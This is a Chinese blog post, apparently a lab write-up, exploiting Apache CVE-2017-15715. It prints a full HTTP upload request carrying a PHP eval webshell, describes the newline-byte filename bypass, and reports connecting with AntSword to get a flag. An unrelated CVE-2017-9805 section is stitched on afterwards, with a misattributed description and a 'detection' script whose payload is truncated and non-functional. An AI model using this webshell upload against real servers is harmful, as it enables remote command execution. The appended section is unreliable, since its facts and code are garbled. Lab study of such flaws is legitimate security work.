apache 文件上传 (CVE-2017-15715)

名称:apache 文件上传 (CVE-2017-15715)

描述:

Apache(音译为阿帕奇)是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。

此漏洞的出现是由于 apache 在修复第一个后缀名解析漏洞时,用正则来匹配后缀。在解析 php 时 xxx.php\x0A 将被按照 php 后缀进行解析,导致绕过一些服务器的安全策略

步骤1

搭建靶场,进行访问

步骤2

打开代理,利用Bp抓包

发生到重放器{Repeater}

ba33796cb5fc10033a1843c0de792c96.png 

修改{Get}->{POST}

8377ee0170828fc54850e88b6bc5dafb.png 

修改发送端,向系统上传一个携带一句话木马的php

POST / HTTP/1.1
Host: 123.58.224.8:27620
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------9552222486401230933854482358
Content-Length: 359
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------9552222486401230933854482358
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: application/octet-stream

<?php @eval($_POST['cmd'])?>
-----------------------------9552222486401230933854482358
Content-Disposition: form-data; name="name"

1.php
-----------------------------9552222486401230933854482358--

发送到响应端

显示无法上传

步骤3

根据提示

添加后缀{+}

在{Hex}中修改ASCII码{2b}->{0a}

重新上传

上传成功

步骤4

访问上传的一句话木马

使用蚁剑链接,得到flag

### 关于CVE-2017-9805漏洞的详情 对于编号为CVE-2017-9805的安全漏洞,这是一个存在于Apache Struts框架中的远程代码执行漏洞。当应用程序使用Struts准备和处理文件上传multipart/form-data请求时,在某些情况下攻击者可以利用此漏洞来触发OGNL表达式的求值并最终实现任意命令执行[^1]。 受影响版本包括但不限于Apache Struts 2.3.x系列直到2.3.34以及2.5.x系列直至2.5.10.1之前的所有版本都受到该问题的影响。 针对这一安全风险,官方建议用户尽快升级至不受影响的新版软件以获得修复补丁。此外,社区也开发了一些辅助工具如`struts-pwn`用于检测环境是否易受攻击,并提供了一种方式去理解和测试这个特定类型的漏洞。 ```python import requests def check_vulnerable(url): headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0' } payload = "%{(#_='multipart/form-data')." try: response = requests.post(url, data=payload, headers=headers) if "500 Internal Server Error" in response.text or response.status_code == 500: print(f"[+] Potential vulnerability detected at {url}") else: print("[!] No obvious signs of vulnerability.") except Exception as e: print(e) # Example usage with a hypothetical URL that might be vulnerable to CVE-2017-9805. check_vulnerable('http://example.com/vulnerable-endpoint') ``` 上述Python脚本展示了如何通过发送特制HTTP POST请求给目标Web应用来初步判断其是否存在CVE-2017-9805漏洞的可能性。请注意这只是一个简单的示例,实际环境中应更加谨慎地评估系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值